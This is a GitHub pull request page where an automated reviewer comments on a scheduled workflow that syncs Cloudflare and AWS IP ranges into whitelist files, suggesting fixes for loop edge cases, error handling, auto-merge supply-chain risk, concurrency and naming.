Conversation
Pull request overview
Adds a scheduled GitHub Actions workflow to periodically download CDN/provider IP ranges from external sources, write them into repo-managed whitelist files, and open a PR with the updates.
Changes:
- Introduces a new scheduled/dispatchable workflow to fetch, transform (optional jq), and write external source outputs.
- Adds a JSON configuration file describing each external source (URL, output path, optional jq_filter/header).
- Automates PR creation (and auto-merge) when outputs change.
Reviewed changes
Copilot reviewed 2 out of 2 changed files in this pull request and generated 6 comments.
| File | Description |
|---|---|
| .github/workflows/sync-external-sources.yml | New workflow to download/process sources, commit updates, open PR, and auto-merge. |
| .github/sync-sources.json | Defines the external sources and output file locations (including AWS ip-ranges jq filters). |
```sh
for i in $(seq 0 $(( COUNT - 1 ))); do
  NAME=$(jq -r ".[$i].name" "$CONFIG_FILE")
  URL=$(jq -r ".[$i].url" "$CONFIG_FILE")
  OUTPUT=$(jq -r ".[$i].output" "$CONFIG_FILE")
  JQ_FILTER=$(jq -r ".[$i].jq_filter // empty" "$CONFIG_FILE")
  HEADER=$(jq -r ".[$i].header // empty" "$CONFIG_FILE")

  echo "--- Processing: $NAME ---"
  echo "  URL: $URL"
  echo "  Output: $OUTPUT"

  TMPFILE=$(mktemp)
  if ! curl -fsSL "$URL" -o "$TMPFILE"; then
    echo "::warning::Failed to download $NAME from $URL"
    ERRORS="$ERRORS $NAME"
    rm -f "$TMPFILE"
    continue
  fi

  OUTFILE=$(mktemp)

  if [ -n "$HEADER" ]; then
    echo "$HEADER" > "$OUTFILE"
  else
    : > "$OUTFILE"
  fi

  if [ -n "$JQ_FILTER" ]; then
    if ! jq -r "$JQ_FILTER" "$TMPFILE" >> "$OUTFILE"; then
      echo "::warning::jq filter failed for $NAME"
      ERRORS="$ERRORS $NAME"
      rm -f "$TMPFILE" "$OUTFILE"
      continue
    fi
  else
    cat "$TMPFILE" >> "$OUTFILE"
  fi

  rm -f "$TMPFILE"

  mkdir -p "$(dirname "$OUTPUT")"

  if [ -f "$OUTPUT" ] && cmp -s "$OUTFILE" "$OUTPUT"; then
    echo "  No changes for $NAME"
    rm -f "$OUTFILE"
  else
    mv "$OUTFILE" "$OUTPUT"
    echo "  Updated: $OUTPUT"
    CHANGED_FILES="$CHANGED_FILES $OUTPUT"
    CHANGED_NAMES="$CHANGED_NAMES $NAME"
  fi
done
```
If `.github/sync-sources.json` is an empty array, `seq 0 $(( COUNT - 1 ))` becomes `seq 0 -1` and the step will fail under `set -e`. Consider guarding for `COUNT == 0` (skip the loop) or iterating via `jq -c '.[]'` instead of index arithmetic.
Suggested change:

```sh
if [ "$COUNT" -eq 0 ]; then
  echo "No sources configured in $CONFIG_FILE; nothing to do."
else
  for i in $(seq 0 $(( COUNT - 1 ))); do
    NAME=$(jq -r ".[$i].name" "$CONFIG_FILE")
    URL=$(jq -r ".[$i].url" "$CONFIG_FILE")
    OUTPUT=$(jq -r ".[$i].output" "$CONFIG_FILE")
    JQ_FILTER=$(jq -r ".[$i].jq_filter // empty" "$CONFIG_FILE")
    HEADER=$(jq -r ".[$i].header // empty" "$CONFIG_FILE")
    echo "--- Processing: $NAME ---"
    echo "  URL: $URL"
    echo "  Output: $OUTPUT"
    TMPFILE=$(mktemp)
    if ! curl -fsSL "$URL" -o "$TMPFILE"; then
      echo "::warning::Failed to download $NAME from $URL"
      ERRORS="$ERRORS $NAME"
      rm -f "$TMPFILE"
      continue
    fi
    OUTFILE=$(mktemp)
    if [ -n "$HEADER" ]; then
      echo "$HEADER" > "$OUTFILE"
    else
      : > "$OUTFILE"
    fi
    if [ -n "$JQ_FILTER" ]; then
      if ! jq -r "$JQ_FILTER" "$TMPFILE" >> "$OUTFILE"; then
        echo "::warning::jq filter failed for $NAME"
        ERRORS="$ERRORS $NAME"
        rm -f "$TMPFILE" "$OUTFILE"
        continue
      fi
    else
      cat "$TMPFILE" >> "$OUTFILE"
    fi
    rm -f "$TMPFILE"
    mkdir -p "$(dirname "$OUTPUT")"
    if [ -f "$OUTPUT" ] && cmp -s "$OUTFILE" "$OUTPUT"; then
      echo "  No changes for $NAME"
      rm -f "$OUTFILE"
    else
      mv "$OUTFILE" "$OUTPUT"
      echo "  Updated: $OUTPUT"
      CHANGED_FILES="$CHANGED_FILES $OUTPUT"
      CHANGED_NAMES="$CHANGED_NAMES $NAME"
    fi
  done
fi
```
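The guard is one fix; the `jq -c '.[]'` route mentioned in the comment avoids index arithmetic altogether, since an empty array simply yields no lines. A minimal sketch (the config contents and paths here are illustrative; the real file is `.github/sync-sources.json`):

```shell
#!/usr/bin/env bash
set -euo pipefail

# Illustrative stand-in for .github/sync-sources.json.
CONFIG_FILE=$(mktemp)
cat > "$CONFIG_FILE" <<'EOF'
[
  {"name": "cloudflare-ipv4", "url": "https://www.cloudflare.com/ips-v4", "output": "out/v4.txt"}
]
EOF

# jq -c '.[]' emits one compact JSON object per line; with an empty
# array it emits nothing, the loop body never runs, and set -e is happy.
PROCESSED=""
while IFS= read -r src; do
  NAME=$(jq -r '.name' <<< "$src")
  URL=$(jq -r '.url' <<< "$src")
  OUTPUT=$(jq -r '.output' <<< "$src")
  echo "--- Processing: $NAME ($URL -> $OUTPUT) ---"
  PROCESSED="$PROCESSED $NAME"
done < <(jq -c '.[]' "$CONFIG_FILE")
```

As a side benefit, each source object is parsed once per field from a single line instead of re-reading the whole config file five times per source.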
```
fi

- name: Create PR with changes
  if: env.NEEDS_UPDATE == 'true'
```
The workflow records download/jq failures in `ERRORS` but still proceeds to open and auto-merge a PR if any other source changed. This can merge partial or incomplete updates. Consider failing the job when `ERRORS` is non-empty, or at least skipping PR creation/merge when any source failed.
Suggested change:

```diff
+    echo "HAS_ERRORS=true" >> "$GITHUB_ENV"
     fi
   - name: Create PR with changes
-    if: env.NEEDS_UPDATE == 'true'
+    if: env.NEEDS_UPDATE == 'true' && env.HAS_ERRORS != 'true'
```
```sh
gh pr merge --auto --merge "$PR_URL"
```
Auto-merging content pulled directly from third-party URLs (`gh pr merge --auto --merge`) creates a supply-chain risk: a compromised upstream could push arbitrary changes into this repo. Consider removing auto-merge, requiring review, and/or validating that the generated files only contain expected IP/CIDR lines before creating/merging the PR.
Suggested change:

```diff
- gh pr merge --auto --merge "$PR_URL"
```
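If auto-merge stays, a content sanity check before committing would at least catch payloads that are not plausible IP lists. A rough sketch (`validate_ip_list` is a hypothetical helper, and the regex is illustrative rather than an RFC-grade parser):

```shell
#!/usr/bin/env bash
set -euo pipefail

# Accept only blank lines, comments, or things shaped like IPv4/IPv6
# addresses or CIDR ranges. Anything else means the upstream payload is
# suspect and the run should stop before a PR is opened.
validate_ip_list() {
  # grep -Ev selects lines that do NOT match the allow-list; if it finds
  # any, the file is invalid, so invert the exit status.
  ! grep -Evq '^([[:space:]]*|#.*|[0-9]{1,3}(\.[0-9]{1,3}){3}(/[0-9]{1,2})?|[0-9A-Fa-f:]+(/[0-9]{1,3})?)$' "$1"
}

printf '103.21.244.0/22\n2400:cb00::/32\n' > /tmp/good.txt
printf '103.21.244.0/22\ncurl https://evil.example | sh\n' > /tmp/bad.txt
```

The workflow could run this on each `$OUTFILE` right after the download/filter step, appending to `ERRORS` on failure so the PR step is skipped.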
```yaml
name: Sync External Sources

on:
  schedule:
    - cron: "0 0 * * *" # every day at midnight UTC
  workflow_dispatch: {}
```
There's no concurrency configured, so a manual dispatch overlapping with the scheduled run (or a slow run overlapping the next schedule) can create multiple branches/PRs and potential merge conflicts. Consider adding a workflow-level `concurrency` group (e.g., based on the workflow name) with `cancel-in-progress: true`.
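A minimal stanza along those lines, as a sketch at the top level of the workflow file (group key is an assumption; any stable key works):

```yaml
# Top level of .github/workflows/sync-external-sources.yml (sketch):
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: true
```

Whether `cancel-in-progress: true` (drop the older run) or `false` (queue behind it) is preferable depends on how long a sync run takes; either way, two runs can no longer push branches at once.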
```json
{
  "name": "cloudflare-ipv6",
  "url": "https://www.cloudflare.com/ips-v6",
  "output": "whitelists/cdn_providers/cloudflare_ip6s.txt"
```
`cloudflare_ip6s.txt` is a slightly ambiguous filename ("ip6s" isn't a common abbreviation elsewhere in this repo). Consider renaming it to something clearer and more consistent, like `cloudflare_ipv6.txt` or `cloudflare_ipv6s.txt`, to make it easier to discover and to avoid accidental typos in downstream consumers.
Suggested change:

```diff
-    "output": "whitelists/cdn_providers/cloudflare_ip6s.txt"
+    "output": "whitelists/cdn_providers/cloudflare_ipv6s.txt"
```
```sh
mv "$OUTFILE" "$OUTPUT"
echo "  Updated: $OUTPUT"
CHANGED_FILES="$CHANGED_FILES $OUTPUT"
CHANGED_NAMES="$CHANGED_NAMES $NAME"
fi
```
`CHANGED_FILES`/`CHANGED_NAMES` are built by prefixing each append with a space, which leaves a leading space in the final values (affecting PR title/body formatting) and relies on word-splitting later. Consider using a newline-delimited list or a bash array and joining when needed.
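The array variant could look like this (paths, names, and the `record_change` helper are illustrative):

```shell
#!/usr/bin/env bash
set -euo pipefail

# Collect changed outputs in arrays instead of space-prefixed strings:
# no leading blank in the joined result, no reliance on word-splitting.
CHANGED_FILES=()
CHANGED_NAMES=()

record_change() {  # record_change <output-path> <source-name>
  CHANGED_FILES+=("$1")
  CHANGED_NAMES+=("$2")
}

record_change "whitelists/cdn_providers/cloudflare_ip6s.txt" "cloudflare-ipv6"
record_change "whitelists/cdn_providers/aws_ips.txt" "aws-ip-ranges"

# Join with a single-character separator when building PR metadata.
TITLE="Sync external sources: $(IFS=','; echo "${CHANGED_NAMES[*]}")"
echo "$TITLE"  # -> Sync external sources: cloudflare-ipv6,aws-ip-ranges
```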
No description provided.